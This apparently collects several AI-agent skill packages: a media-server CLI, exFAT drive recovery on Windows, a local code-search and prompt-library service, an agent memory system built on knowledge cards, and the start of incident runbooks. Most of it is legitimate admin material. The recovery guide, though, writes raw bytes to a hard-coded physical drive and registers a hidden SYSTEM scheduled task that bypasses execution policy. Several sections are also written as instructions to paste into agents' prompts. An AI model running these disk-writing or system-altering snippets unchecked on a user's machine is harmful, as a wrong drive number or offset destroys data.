media downloads resume <hash|all> media downloads remove <hash> [true] # true = delete files too ``` ### Status & Monitoring ```bash media status # Health + library counts + active downloads media queue # Sonarr/Radarr download queues media wanted # Missing episodes + movies media calendar 14 # Upcoming releases (next N days) media history # Recent activity media refresh # Trigger library rescan media indexers # Prowlarr indexer status ``` ### Subtitles (Bazarr) ```bash media subs # Wanted subtitles media subs history # Recent subtitle downloads ``` ### Requests (Jellyseerr) ```bash media requests # Pending user requests media requests trending # What's trending media requests users # User list with request counts ``` ### Transcoding (Tdarr) ```bash media tdarr # Status + active workers media tdarr workers # Per-file progress: %, fps, ETA media tdarr queue # Items queued for processing ``` ## Connection Modes ### Local (services on same machine) ``` MEDIA_HOST="local" ``` ### Remote via SSH (services on another host) ``` MEDIA_HOST="ssh:hyperv-host" # Uses SSH config alias MEDIA_HOST_OS="linux" # or "windows" ``` SSH mode tunnels all API calls through your existing SSH config. Services stay on localhost and are never exposed to the network. No additional ports or credentials needed beyond your normal SSH access. Windows hosts automatically use PowerShell's `Invoke-RestMethod` for POST requests. ## AI Agent Integration Commands are designed for easy parsing by AI agents. Any tool that can run shell commands works: ``` "What shows am I missing episodes for?" → media wanted "Add Succession" → media shows add "Succession" "What's downloading right now?" → media downloads active "Pause all downloads" → media downloads pause all ``` Works with OpenClaw, LangChain, Claude computer use, or any agent framework with shell execution. ## Requirements - bash 4.0+ - curl - python3 (standard library only, no pip) - ssh (only for remote mode) ## Technical Details - Single bash script (~900 lines) - Talks to *arr v3 APIs (Sonarr/Radarr), v1 (Prowlarr), v2 (qBittorrent WebUI) - Python3 used strictly for JSON parsing (standard library) - No telemetry, no analytics, no network calls except to your own services - Config stored at `~/.config/media-cli/config` with chmod 600 FILE:README.md # media-cli Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal. Works locally or over SSH to remote hosts (including Windows). ## Install ```bash git clone https://github.com/solomonneas/media-cli.git cd media-cli cp media ~/bin/media && chmod +x ~/bin/media media setup ``` ## Highlights - **One script, no dependencies** (just bash, curl, python3) - **SSH remote mode** for headless servers. Services stay on localhost, CLI tunnels through SSH - **Windows support** via PowerShell Invoke-RestMethod over SSH - **AI-friendly** output designed for agent parsing - **7 services** managed from one command ## Source https://github.com/solomonneas/media-cli ## Tags media, sonarr, radarr, plex, jellyfin, torrents, automation, homelab, arr
Recover corrupted exFAT USB drives on Windows without formatting. Diagnose boot region corruption, repair with chkdsk or TestDisk, and prevent future corrupt...
---
name: exfat-recovery
version: 1.0.0
description: "Recover corrupted exFAT USB drives on Windows without formatting. Diagnose boot region corruption, repair with chkdsk or TestDisk, and prevent future corruption with write cache fixes, shutdown flush scripts, and automated boot region backups. Covers the 'needs to be formatted' panic scenario."
tags:
- exfat
- recovery
- usb
- windows
- data-recovery
- sysadmin
- filesystem
category: tools
---
# exFAT Recovery — Fix "Needs to be Formatted" Without Losing Data
When Windows says your external drive "needs to be formatted," your data is almost always fine. The exFAT boot region got corrupted (usually from write caching + unexpected shutdown). This skill walks through diagnosis, repair, and prevention.
## When to Use
- External USB drive suddenly says "needs to be formatted"
- Drive shows in Disk Management but filesystem is blank
- chkdsk reports "Corruption was found while examining the boot region"
- Any exFAT drive that won't mount after a crash or reboot
## Diagnosis
### Step 1: Confirm the drive is recognized
```powershell
Get-Disk | Format-Table Number, FriendlyName, Size, PartitionStyle, OperationalStatus, HealthStatus -AutoSize
```
If `HealthStatus: Healthy` and `OperationalStatus: Online`, the hardware is fine. If not, you have a hardware problem (different fix).
### Step 2: Check the partition exists
```powershell
Get-Partition -DriveLetter H | Format-Table PartitionNumber, DriveLetter, Size, Type -AutoSize
```
Partition visible = partition table intact. Good sign.
### Step 3: Check filesystem status
```powershell
Get-Volume -DriveLetter H | Format-List DriveLetter, FileSystem, Size, SizeRemaining, HealthStatus
```
If `FileSystem` is blank and `Size` is 0, the filesystem metadata is corrupted but the partition is there.
### Step 4: Read-only chkdsk to confirm
```powershell
chkdsk H:
```
Look for: `Corruption was found while examining the boot region.` This confirms it's fixable.
## Recovery
### Option 1: chkdsk /F (try this first)
Run as Administrator:
```powershell
chkdsk H: /F
```
Repairs the exFAT boot region from the backup copy (exFAT stores backup boot sectors at sectors 12-23). For an 8TB drive with ~140K files, takes a few minutes.
Verify after:
```powershell
Get-Volume -DriveLetter H
Get-ChildItem H:\ | Select-Object Name | Format-Table -AutoSize
```
### Option 2: TestDisk (if chkdsk fails)
1. Download from https://www.cgsecurity.org/wiki/TestDisk
2. Run `testdisk_win.exe` as Administrator
3. Select physical disk → GPT → Advanced → Boot
4. TestDisk rebuilds the boot sector from the backup copy
### Option 3: Data recovery tools (last resort)
If the filesystem is unrecoverable:
- **R-Studio** (paid, best for exFAT) — recovers directory structure
- **PhotoRec** (free) — recovers files by type, loses filenames
- **DMDE** (free tier) — good at exFAT reconstruction
## Prevention
### 1. Disable write caching (most important)
Write caching is the #1 cause of exFAT corruption on external drives.
**Device Manager method:**
1. Device Manager → Disk drives → your external drive
2. Properties → Policies tab
3. Select "Quick removal" (disables write cache)
**PowerShell (scriptable):**
```powershell
# Adjust Ven_ and Prod_ to match your drive
$devPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_Samsung&Prod_PSSD_T5_EVO"
$instances = Get-ChildItem $devPath
foreach ($inst in $instances) {
$diskParamPath = Join-Path $inst.PSPath "Device Parameters\Disk"
if (Test-Path $diskParamPath) {
Set-ItemProperty -Path $diskParamPath -Name "UserWriteCacheSetting" -Value 0 -Type DWord
}
}
```
### 2. Shutdown flush script
Insurance even with write caching disabled. Use `scripts/safe-shutdown.ps1` and register it as a Group Policy shutdown script. See `references/prevention-scripts.md` for the full setup.
### 3. Weekly boot region backup
Use `scripts/backup-boot-region.ps1` to save a copy of the exFAT boot region every week. If corruption happens again, restore from backup instead of hoping chkdsk works.
### 4. Restore from backup
```powershell
# Run as Admin - writes raw bytes to disk
$disk = "\\.\PhysicalDrive3" # adjust
$offset = 16777216 # partition offset in bytes
$backupFile = "C:\path\to\exfat_boot_region_YYYYMMDD.bin"
$buf = [System.IO.File]::ReadAllBytes($backupFile)
$fs = [System.IO.File]::Open($disk, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Write, [System.IO.FileShare]::ReadWrite)
[void]$fs.Seek($offset, [System.IO.SeekOrigin]::Begin)
$fs.Write($buf, 0, $buf.Length)
$fs.Flush()
$fs.Close()
# Then: chkdsk H: /F
```
## Key Facts
- "Needs to be formatted" almost always means corrupted metadata, NOT lost data
- exFAT doesn't journal like NTFS, so it's fragile on unexpected shutdowns
- exFAT keeps a backup boot region at sectors 12-23 of the partition
- chkdsk /F fixes most cases by restoring from this backup
- Write caching on external drives is the #1 cause. Disable it.
- DO NOT format the drive. That actually destroys the data.
## Root Cause
exFAT has no journaling. When Windows has write caching enabled for an external drive and the system reboots (crash, update, power loss), dirty cached writes never flush. The boot region (filesystem's "table of contents") gets partially written and becomes unreadable. The actual file data on disk is untouched.
FILE:README.md
# exfat-recovery
Recover corrupted exFAT USB drives on Windows without formatting. When Windows says "needs to be formatted," your data is almost always fine.
## The Problem
exFAT doesn't journal like NTFS. Unexpected shutdowns with write caching enabled corrupt the boot region (filesystem's table of contents). Windows can't read the drive but the actual files are untouched.
## What This Skill Does
1. **Diagnose** — Confirm it's boot region corruption, not hardware failure
2. **Recover** — chkdsk /F (uses exFAT's built-in backup boot region), TestDisk, or data recovery tools
3. **Prevent** — Disable write caching, shutdown flush scripts, automated weekly boot region backups
## Works With
Any exFAT external drive on Windows (USB-C SSDs, flash drives, SD cards). Tested on Samsung T5 EVO 8TB.
## Tags
exfat, recovery, usb, windows, data-recovery, sysadmin, filesystem
FILE:references/prevention-scripts.md
# Prevention Scripts Setup
## Shutdown Flush Script
Flushes write cache before Windows shuts down.
### Create the script
Save as `C:\Users\<user>\backups\safe_shutdown.ps1`:
```powershell
$logPath = "C:\Users\$env:USERNAME\backups\shutdown_log.txt"
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
try {
Write-VolumeCache -DriveLetter H -ErrorAction Stop
"$timestamp : Flushed write cache for H:" | Out-File $logPath -Append
} catch {
"$timestamp : ERROR flushing cache - $($_.Exception.Message)" | Out-File $logPath -Append
}
```
### Register as Group Policy shutdown script
Run as Administrator:
```powershell
$shutdownScript = "C:\Users\$env:USERNAME\backups\safe_shutdown.ps1"
foreach ($basePath in @(
"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0",
"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0"
)) {
$scriptKey = "$basePath\0"
if (-not (Test-Path $basePath)) { New-Item -Path $basePath -Force | Out-Null }
Set-ItemProperty -Path $basePath -Name "GPO-ID" -Value "LocalGPO" -Type String
Set-ItemProperty -Path $basePath -Name "SOM-ID" -Value "Local" -Type String
Set-ItemProperty -Path $basePath -Name "FileSysPath" -Value "C:\Windows\System32\GroupPolicy\Machine" -Type String
Set-ItemProperty -Path $basePath -Name "DisplayName" -Value "Local Group Policy" -Type String
Set-ItemProperty -Path $basePath -Name "GPOName" -Value "Local Group Policy" -Type String
Set-ItemProperty -Path $basePath -Name "PSScriptOrder" -Value 1 -Type DWord
if (-not (Test-Path $scriptKey)) { New-Item -Path $scriptKey -Force | Out-Null }
Set-ItemProperty -Path $scriptKey -Name "Script" -Value $shutdownScript -Type String
Set-ItemProperty -Path $scriptKey -Name "Parameters" -Value "" -Type String
Set-ItemProperty -Path $scriptKey -Name "IsPowershell" -Value 1 -Type DWord
Set-ItemProperty -Path $scriptKey -Name "ExecTime" -Value ([byte[]](0x00 * 16)) -Type Binary
}
```
## Boot Region Backup (Weekly)
### Create the backup script
Save as `C:\Users\<user>\backups\backup_boot_region.ps1`:
```powershell
$ErrorActionPreference = "Stop"
# Find your disk number: Get-Partition -DriveLetter H | Select DiskNumber
# Find offset: Get-Partition -DriveLetter H | Select Offset
$disk = "\\.\PhysicalDrive3"
$offset = 16777216 # partition offset in bytes
$size = 24 * 512 # 24 sectors (12 main + 12 backup boot region)
$outDir = "C:\Users\$env:USERNAME\backups\exfat_boot"
$outPath = "$outDir\exfat_boot_region_$(Get-Date -Format 'yyyyMMdd').bin"
$logPath = "$outDir\backup_log.txt"
if (-not (Test-Path $outDir)) { New-Item -ItemType Directory -Path $outDir -Force | Out-Null }
try {
$fs = [System.IO.File]::Open($disk, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
[void]$fs.Seek($offset, [System.IO.SeekOrigin]::Begin)
$buf = New-Object byte[] $size
$read = $fs.Read($buf, 0, $size)
$fs.Close()
[System.IO.File]::WriteAllBytes($outPath, $buf)
"$(Get-Date): Backed up $read bytes to $outPath" | Out-File $logPath -Append
} catch {
"$(Get-Date): ERROR - $_" | Out-File $logPath -Append
}
```
### Create scheduled task
```powershell
$action = New-ScheduledTaskAction -Execute "powershell.exe" `
-Argument "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File `"C:\Users\$env:USERNAME\backups\backup_boot_region.ps1`""
$trigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Sunday -At "3:00AM"
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest -LogonType ServiceAccount
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName "BackupExFATBootRegion" -Action $action -Trigger $trigger `
-Principal $principal -Settings $settings -Description "Weekly backup of exFAT boot region"
```
Lightweight agent productivity toolkit: semantic code search with embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependenc...
---
name: ops-deck-lite
version: 1.0.0
description: "Lightweight agent productivity toolkit: semantic code search with embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependencies. Your agent searches code by meaning (not grep) and reuses proven prompts instead of writing from scratch every time."
tags:
- code-search
- prompt-library
- embeddings
- productivity
- semantic-search
- agent-tools
category: tools
---
# Ops Deck Lite — Code Search + Prompt Library
Two high-impact services that make any AI agent dramatically more efficient: semantic code search and a categorized prompt library. Lightweight (~200MB RAM), local-only, zero cloud costs.
For the full operational stack (agent intel, social pipeline, dev journal, monitoring), see `ops-deck`.
## What You Get
### 1. Semantic Code Search (:5204)
Search your entire codebase by meaning, not just text matching. Ask "authentication middleware" and find the actual auth code even if it's called `verifyToken` or `checkSession`.
- **Hybrid search**: vector similarity + keyword matching
- **Local embeddings**: qwen3-embedding:8b via Ollama (free, private)
- **Code summaries**: each chunk gets a natural language summary for better semantic matching
- **Fast**: <100ms search across 96K+ code chunks
- **Nightly re-index**: cron at 4am keeps the index fresh
```bash
# Search
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"database connection pooling","mode":"hybrid","limit":10}'
# Health check
curl -s http://localhost:5204/api/health
# Re-index (with summaries)
curl -X POST http://localhost:5204/api/index?summarize=true
# Filter by project
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"error handling","mode":"hybrid","project":"my-api","limit":5}'
```
**Modes:**
- `hybrid` (default, best) — combines vector similarity with text matching
- `code` — raw code matching only
- `summary` — search against natural language summaries
### 2. Prompt Library (:5202)
Categorized, searchable prompt templates. Stop writing the same prompts from scratch every session.
```bash
# List all prompts
curl -s http://localhost:5202/api/prompts | python3 -c "
import sys,json
[print(f'{p[\"id\"]}: {p[\"title\"]} [{p[\"category\"]}]') for p in json.load(sys.stdin)]
"
# Get a specific prompt
curl -s http://localhost:5202/api/prompts/<id>
# Create a prompt
curl -s -X POST http://localhost:5202/api/prompts \
-H "Content-Type: application/json" \
-d '{"title":"Code Review","category":"coding","content":"Review this code for..."}'
```
## Prerequisites
- Node.js 18+ (for prompt library)
- Python 3.10+ with FastAPI and uvicorn (for code search)
- Ollama with `qwen3-embedding:8b` model
- PM2 for process management
- SQLite (for code search index, no external DB)
## Setup
### 1. Install dependencies
```bash
npm install -g pm2
pip install fastapi uvicorn aiofiles
# Ollama embedding model
ollama pull qwen3-embedding:8b
```
### 2. Create the Code Search service
```bash
mkdir -p pipeline/work/code-search
cd pipeline/work/code-search
# The server needs:
# - server.py (FastAPI app)
# - code_index.db (SQLite, auto-created on first index)
# - Ollama running locally for embeddings
```
Key code search server features:
- Walks your project directories, splits code into chunks
- Generates embeddings via Ollama API (localhost:11434)
- Stores chunks + embeddings + summaries in SQLite
- FastAPI with POST /api/search, GET /api/health, POST /api/index
### 3. Create the Prompt Library
```bash
mkdir -p pipeline/work/prompt-library/backend
cd pipeline/work/prompt-library/backend
# Express server with:
# - GET /api/prompts (list all)
# - GET /api/prompts/:id (get one)
# - POST /api/prompts (create)
# - PUT /api/prompts/:id (update)
# - DELETE /api/prompts/:id (delete)
# - SQLite or JSON file storage
```
### 4. PM2 config
```javascript
// ecosystem.config.cjs
module.exports = {
apps: [
{
name: 'code-search',
cwd: './pipeline/work/code-search',
script: 'server.py',
interpreter: 'python3',
autorestart: true,
},
{
name: 'prompt-library-api',
cwd: './pipeline/work/prompt-library/backend',
script: 'server.js',
autorestart: true,
},
]
};
```
### 5. Start and index
```bash
pm2 start ecosystem.config.cjs
pm2 save
# Initial code index (takes a few minutes depending on codebase size)
curl -X POST http://localhost:5204/api/index?summarize=true
# Set up nightly re-index
(crontab -l 2>/dev/null; echo "0 4 * * * curl -s -X POST http://localhost:5204/api/index?summarize=true > /dev/null") | crontab -
```
## Agent Integration
Add to your AGENTS.md or TOOLS.md:
```markdown
## Code Search API (USE THIS FIRST)
Before you grep, before you spawn a sub-agent, before you read 10 files: HIT THIS API.
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"your search here","mode":"hybrid","limit":10}'
## Prompt Library
Before writing a prompt from scratch, check if one exists:
curl -s http://localhost:5202/api/prompts
```
## Resource Usage
| Service | RAM | CPU | Disk |
|---------|-----|-----|------|
| Code Search | ~150MB | <1% idle | ~50MB index per 100K chunks |
| Prompt Library | ~50MB | <1% idle | <1MB |
| Ollama (embedding model) | ~4GB | Spikes during indexing | ~4GB model |
Total: ~200MB for the services (Ollama runs independently and is shared with other tools).
## Why Not Just Grep?
Grep finds exact text matches. Code search finds **meaning**:
| Query | Grep finds | Code Search finds |
|-------|-----------|-------------------|
| "auth middleware" | Files containing "auth middleware" | `verifyToken()`, `checkSession()`, `requireAuth()` |
| "database pooling" | Files containing "database pooling" | `createPool()`, `getConnection()`, `pg.Pool` config |
| "error handling" | Files containing "error handling" | try/catch blocks, error middleware, custom Error classes |
The embeddings understand code semantics. That's the whole point.
FILE:README.md
# ops-deck-lite
Lightweight agent productivity toolkit: semantic code search with local embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependencies.
## Why
- **Code Search**: Your agent searches code by meaning, not grep. Ask "authentication middleware" and find `verifyToken()` even though the word "middleware" never appears in that file.
- **Prompt Library**: Stop writing the same prompts from scratch every session. Categorized, searchable, versioned.
## Stack
- **Code Search** (:5204) — FastAPI + SQLite + qwen3-embedding:8b via Ollama
- **Prompt Library** (:5202) — Express/Node + SQLite or JSON
Both managed by PM2. Total ~200MB RAM.
## Quick Start
```bash
ollama pull qwen3-embedding:8b
npm install -g pm2
pm2 start ecosystem.config.cjs
curl -X POST http://localhost:5204/api/index?summarize=true
```
## For the full stack, see `ops-deck`
Adds agent intel, social pipeline, dev journal, variant gallery, and system monitoring.
## Tags
code-search, prompt-library, embeddings, productivity, semantic-search, agent-tools
Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards with YAML frontm...
---
name: self-learning-agent
version: 1.0.0
description: "Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards with YAML frontmatter, daily logs, and a slim master index. Captures lessons, corrections, preferences, and facts automatically. Built for agents that need persistent memory across sessions."
tags:
- memory
- learning
- self-improving
- knowledge-management
- agent-memory
- persistence
category: agent
---
# Self-Learning Agent — Knowledge Card Memory System
A production-tested memory architecture for AI agents that wake up fresh each session. Instead of one monolithic memory file that grows until it's unusable, this system uses atomic knowledge cards (~350 tokens each) searched semantically, daily logs for raw notes, and a slim master index loaded every session.
## Architecture
```
workspace/
├── MEMORY.md # Master index (~2KB, loaded every session)
├── memory/
│ ├── cards/ # Knowledge cards (~350 tokens each)
│ │ ├── topic-name.md # One topic per file, YAML frontmatter
│ │ ├── another-topic.md
│ │ └── ...
│ └── YYYY-MM-DD.md # Daily session logs (raw notes)
```
### Why This Works
- **MEMORY.md** is tiny (~2KB). It loads fast, gives the agent orientation, and points to everything else.
- **Knowledge cards** are atomic. Each one covers ONE topic in ~350 tokens. Semantic search finds the right cards without loading everything.
- **Daily logs** are append-only scratch pads. Raw session notes, not curated.
- **Cards are curated wisdom. Daily logs are raw data.** The agent periodically distills daily logs into cards during maintenance.
## Setup
### 1. Create the directory structure
```bash
mkdir -p memory/cards
```
### 2. Create MEMORY.md (master index)
This file is loaded every session. Keep it under 2KB. It should contain:
```markdown
# MEMORY.md — Master Index
## How Memory Works
- **This file:** Slim index (~2KB). Loaded every main session.
- **Knowledge cards:** `memory/cards/*.md` (~N cards, ~350 tokens each). Searched semantically.
- **Daily logs:** `memory/YYYY-MM-DD.md`. Raw session notes.
- **DO NOT** dump everything here. Write knowledge cards instead.
## Identity
[Agent name, model, owner, key facts]
## Quick Context
[2-3 lines of what matters right now]
## Card Categories
[Table mapping categories to card topics]
## Current Priorities
[What's actively being worked on]
```
### 3. Add to your AGENTS.md / system prompt
```markdown
## Every Session
1. Read MEMORY.md (slim index)
2. Search `memory_search` for context relevant to the current task
3. Skim today + yesterday daily logs for recent context
4. Start working
## Memory Rules
- "Mental notes" don't survive session restarts. Files do.
- When someone says "remember this" → write a knowledge card
- When you learn a lesson → write a knowledge card
- When you make a mistake → document it so future-you doesn't repeat it
```
## Knowledge Card Format
Every card has YAML frontmatter and dense content:
```markdown
---
topic: Descriptive Topic Name
category: system|human|infrastructure|tools|workflow|projects|lessons|career|security|models
tags: [tag1, tag2, tag3]
created: YYYY-MM-DD
updated: YYYY-MM-DD
---
The actual content. Dense, factual, no fluff.
Write for future-you who has zero context.
Include specific commands, paths, config values.
Keep under 350 tokens.
```
### Card Quality Rules
1. **ONE topic per card.** Three insights = three cards.
2. **~350 tokens max.** Dense beats verbose.
3. **Zero-context readable.** Include specifics (commands, paths, values).
4. **Tags are searchable keywords.** Lowercase, hyphenated.
5. **Update, don't duplicate.** If a card exists for the topic, merge new info into it.
6. **No fluff.** Every sentence should contain a fact, a command, or a decision.
### Good Card Example
```markdown
---
topic: Cortex CSRF Automation
category: infrastructure
tags: [cortex, csrf, thehive, api, security]
created: 2026-03-19
updated: 2026-03-19
---
Cortex 3.1.8 uses non-standard CSRF. Cookie: CORTEX-XSRF-TOKEN, header: X-CORTEX-XSRF-TOKEN.
Standard Play Framework bypass headers (Csrf-Token: nocheck) do NOT work.
Flow: Login → GET any endpoint with session cookie → capture CORTEX-XSRF-TOKEN from Set-Cookie →
send as both cookie AND X-CORTEX-XSRF-TOKEN header on all POST/PUT/DELETE.
Shortcut: After generating first API key, use Authorization: Bearer which bypasses CSRF entirely.
First-user POST /api/user (no auth) only works when zero users exist in DB.
```
### Bad Card Example
```markdown
---
topic: Stuff I Learned Today
---
Today I learned a bunch of things about Cortex and TheHive. The CSRF thing was really tricky
and took a while to figure out. I also learned about how to set up organizations and users.
It was a productive session overall.
```
(Too vague, no specifics, no actionable info, multiple topics in one card)
## Capture Triggers
### Automatic (agent should capture without being asked)
- Hard-won debugging lessons (3+ attempts to fix something)
- Configuration gotchas (things that work differently than expected)
- User corrections ("no, do it THIS way")
- Non-obvious facts about infrastructure, people, or projects
- Workflow improvements discovered during a task
### Manual
- User says `/learn`, "remember this", or "save this"
- User explicitly corrects the agent's approach
### What NOT to Capture
- Obvious/trivial information
- Temporary context (one-time fixes that won't recur)
- Things already in existing cards
- Conversation summaries (that's what daily logs are for)
## Daily Log Format
Append to `memory/YYYY-MM-DD.md`:
```markdown
## HH:MM — Brief Title
What happened, what was decided, what was learned.
Link to any cards created: `→ card: topic-name`
```
## Memory Maintenance
Periodically (every few days), the agent should:
1. Read recent daily logs
2. Identify significant events worth preserving long-term
3. Create or update knowledge cards from insights
4. Remove outdated info from MEMORY.md
5. Update the card categories table in MEMORY.md
Think of it like a human reviewing their journal and updating their mental model.
## Promotion Rules
When the same lesson appears 3+ times in cards:
- Promote it to AGENTS.md as a permanent rule
- Mark the original card as "promoted"
- This prevents the agent from re-learning the same lesson
## Session Workflow
```
Session Start
│
├── Read MEMORY.md (always, ~2KB)
├── memory_search for task-relevant cards
├── Skim today + yesterday daily logs
│
├── [Do work]
│
├── Capture insights → knowledge cards
├── Log session → daily log
│
Session End
```
## Scaling
This system has been tested with:
- ~36 knowledge cards (~350 tokens each = ~12.6K tokens total)
- Daily logs spanning months
- Semantic search via embeddings (qwen3-embedding or similar)
At this scale, semantic search finds relevant cards in <100ms. The master index stays under 2KB. The agent loads only what it needs.
If you hit 100+ cards, consider:
- Archiving cards older than 6 months that haven't been accessed
- Splitting categories into subdirectories
- Adding a card index file per category
## Comparison with Monolithic Memory
| | Monolithic (one big file) | Knowledge Cards |
|---|---|---|
| Load time | Grows forever | Constant (~2KB index) |
| Search | Full-text scan | Semantic vector search |
| Updates | Append-only chaos | Atomic card updates |
| Noise ratio | High (old + new mixed) | Low (curated cards) |
| Session cost | Tokens scale with history | Tokens stay flat |
FILE:README.md
# self-learning-agent
Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards, daily logs, and a slim master index.
## The Problem
AI agents lose context between sessions. The common fix (one big MEMORY.md) works until it doesn't. After a few weeks, the file is 60KB of mixed-relevance notes that burns tokens on every load and buries important facts in noise.
## The Solution
Three-tier memory architecture:
1. **MEMORY.md** (~2KB) — Slim master index, loaded every session. Orientation only.
2. **Knowledge cards** (~350 tokens each) — Atomic facts with YAML frontmatter. One topic per file. Searched semantically, not loaded in bulk.
3. **Daily logs** — Raw session notes. Periodically distilled into cards.
## How It Works
- Agent loads the 2KB index on startup (constant cost regardless of history length)
- Semantic search finds relevant cards for the current task
- Agent captures lessons, corrections, and facts as new cards
- Periodically distills daily logs into curated cards
- Lessons that repeat 3+ times get promoted to permanent rules
## Production Tested
Running in production with ~36 cards spanning infrastructure, security, career, tools, and workflow topics. Semantic search via embeddings finds the right card in <100ms. Session token cost stays flat regardless of how many months of history exist.
## Tags
memory, learning, self-improving, knowledge-management, agent-memory, persistence
FILE:references/card-examples.md
# Knowledge Card Examples
## Infrastructure Card
```markdown
---
topic: Buffalo NAS Storage
category: infrastructure
tags: [nas, smb, storage, buffalo, backup]
created: 2026-01-15
updated: 2026-02-20
---
NAS Server at YOUR_NAS_IP. Mount: /mnt/nas (SMB/CIFS, guest).
~2.7TB total, ~2.1TB free. Auto-mounts via fstab + systemd automount.
Key dirs:
- Pictures/Al Pics/ — 287GB family photos (2018-2021), IRREPLACEABLE
- Phone_Backups/ — by device/date
- backups/ — migration backup (4GB)
- ai-gen/ — datasets, models, workflows
Manual mount: sudo mount /mnt/nas
Other shares: smbclient //YOUR_NAS_IP/<share> -N
```
## Lesson Card
```markdown
---
topic: TheHive Password Change Gotcha
category: lessons
tags: [thehive, api, password, gotcha]
created: 2026-03-19
updated: 2026-03-19
---
PATCH /api/v1/user/<login> returns 204 but SILENTLY IGNORES the password field.
Must use POST /api/v1/user/<login>/password/change with body:
{"currentPassword":"old","password":"new"}
Also: passwords with ! break curl due to bash history expansion.
Fix: printf '{"password":"Foo!"}' | curl -d @-
```
## Workflow Card
```markdown
---
topic: Code Search API
category: tools
tags: [code-search, api, embeddings, search]
created: 2026-02-15
updated: 2026-03-10
---
Local code search at http://localhost:5204/api/search
Modes: hybrid (default, best), code (raw), summary (NL)
Stack: qwen3-embedding:8b embeddings + qwen3-coder-next:cloud summaries
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"search term","mode":"hybrid","limit":10}'
Health: curl localhost:5204/api/health
Re-index: curl -X POST localhost:5204/api/index?summarize=true
Nightly re-index at 4am via cron.
```
## Human Context Card
```markdown
---
topic: Human Context
category: human
tags: [owner, user, preferences]
created: 2026-01-31
updated: 2026-03-15
---
Your Name ([email protected])
Targeting Network Admin at Southeastern University (SEU).
M.S. Cybersecurity at USF, 12 credits remaining (Fall 2026 graduation).
Preferences:
- No em dashes. Ever. Use periods, commas, colons, parentheses.
- Chicago Notes-Bibliography citation standard.
- Pragmatic > theoretical. Show me the command, not the theory.
- Hates sycophantic AI responses. Be direct.
```
## Category Reference
| Category | Use For |
|----------|---------|
| system | Agent config, identity, search, crons |
| human | Owner info, preferences, communication style |
| infrastructure | Hardware, ports, services, networking |
| models | AI model subscriptions, assignments, benchmarks |
| workflow | Pipelines, content, sprints, dev tools |
| career | Jobs, resume, education, negotiations |
| tools | APIs, CLIs, integrations, reference docs |
| business | LLC, service business, branding |
| projects | Project status, architecture, decisions |
| security | Audits, hardening, OSINT |
| school | Course notes, assignments, writing standards |
| research | Latest findings, intel |
| lessons | Hard-won gotchas, corrections, mistakes |
Production-ready incident response runbook templates. Step-by-step procedures for detection, triage, mitigation, resolution, and communication. Includes esca...
---
name: incident-runbook-templates
version: 1.0.0
description: "Production-ready incident response runbook templates. Step-by-step procedures for detection, triage, mitigation, resolution, and communication. Includes escalation paths, on-call onboarding, and post-incident review formats."
---
# Incident Runbook Templates
Production-ready templates for incident response runbooks covering detection, triage, mitigation, resolution, and communication.
## Do not use this skill when
- The task is unrelated to incident runbook templates
- You need a different domain or tool outside this scope
## Instructions
- Clarify goals, constraints, and required inputs.
- Apply relevant best practices and validate outcomes.
- Provide actionable steps and verification.
- If detailed examples are required, open `resources/implementation-playbook.md`.
## Use this skill when
- Creating incident response procedures
- Building service-specific runbooks
- Establishing escalation paths
- Documenting recovery procedures
- Responding to active incidents
- Onboarding on-call engineers
## Core Concepts
### 1. Incident Severity Levels
| Severity | Impact | Response Time | Example |
|----------|--------|---------------|---------|
| **SEV1** | Complete outage, data loss | 15 min | Production down |
| **SEV2** | Major degradation | 30 min | Critical feature broken |
| **SEV3** | Minor impact | 2 hours | Non-critical bug |
| **SEV4** | Minimal impact | Next business day | Cosmetic issue |
### 2. Runbook Structure
```
1. Overview & Impact
2. Detection & Alerts
3. Initial Triage
4. Mitigation Steps
5. Root Cause Investigation
6. Resolution Procedures
7. Verification & Rollback
8. Communication Templates
9. Escalation Matrix
```
## Runbook Templates
### Template 1: Service Outage Runbook
```markdown
# [Service Name] Outage Runbook
## Overview
**Service**: Payment Processing Service
**Owner**: Platform Team
**Slack**: #payments-incidents
**PagerDuty**: payments-oncall
## Impact Assessment
- [ ] Which customers are affected?
- [ ] What percentage of traffic is impacted?
- [ ] Are there financial implications?
- [ ] What's the blast radius?
## Detection
### Alerts
- `payment_error_rate > 5%` (PagerDuty)
- `payment_latency_p99 > 2s` (Slack)
- `payment_success_rate < 95%` (PagerDuty)
### Dashboards
- [Payment Service Dashboard](https://grafana/d/payments)
- [Error Tracking](https://sentry.io/payments)
- [Dependency Status](https://status.stripe.com)
## Initial Triage (First 5 Minutes)
### 1. Assess Scope
```bash
# Check service health
kubectl get pods -n payments -l app=payment-service
# Check recent deployments
kubectl rollout history deployment/payment-service -n payments
# Check error rates
curl -s "http://prometheus:9090/api/v1/query?query=sum(rate(http_requests_total{status=~'5..'}[5m]))"
```
### 2. Quick Health Checks
- [ ] Can you reach the service? `curl -I https://api.company.com/payments/health`
- [ ] Database connectivity? Check connection pool metrics
